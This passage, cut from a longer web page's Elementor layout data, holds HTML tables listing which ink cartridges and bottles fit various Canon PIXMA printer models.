width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 